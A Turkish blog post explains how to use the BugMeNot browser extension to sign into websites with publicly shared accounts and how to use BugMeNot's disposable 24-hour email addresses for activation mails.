Öncelikle BugMeNot eklentisinin buradaki bağlantıyla kurulum işlemini yapın. Daha sonra login olmak istediğiniz sitenin kullanıcı adı ya da şifre kutusuna sağ tıklayıp “Login with BugMeNot” komunutu seçin.

Sisteme kayıtlı birden fazla hesap varsa herhangi biriyle giriş yapmayı deneyecektir.

Bazı hesaplarda muhtemelen daha öce giren kişi tarafından şifresi değiştirildiği ya da ilgili sitenin sisteminden silindiği için giriş yapamayabilir. Bir kaç defa giriş yapmayı denerseniz başka bir kullanıcı hesabıyla giriş yapmayı deneyecektir.

—————————————————————————————————–

BugMeNot.com, isteyen herkesin herhangi bir sitede oluşturduğu kullanıcı adı ve şifresini paylaşabildiği bir site. Böylece sadece bir defalığına ulaşmak istediğiniz içerik için uyelik işlemleriyle uğraşmak ve mail adresinizi vermek zorunda kalmıyorsunuz. Mail adresinizi vermediğiniz için dolaylı olarak da olsa spam’dan korunmanıza katkı sağlıyor. Tek yapmanız BugMeNot.com‘da erişmek istediğiniz sitenin adıyla arama yapmak ve eklenmiş hesaplarla giriş yapmayı denemek.

——————————————————————————————————

Kullan At Mail Hesabı

BugMeNot.com’um sunduğu bir diğer hizmet ise kullan at diyebileceğimiz, gelen postanın 24 saat sonra silindiği mail hesapları. Örneğin mail aktivasyonu isteyen bir siteye kaydolmak ama kullandığınız mail adresini de paylaşmamak istiyorsunuz. Bu durumda yapmanız gereken @bugmenot.com uzantılı herhangi bir mail adresi vermek (deneme123@bugmenot.com gibi) olacak. Daha sonra aktivasyon mailine ulaşmak için email.bugmenot.com adresinde verdiğiniz maili yazıp “Read EMails” butonuna tıklamanız yeterli

« Önceki girişler
Takip Et

Get every new post delivered to your Inbox.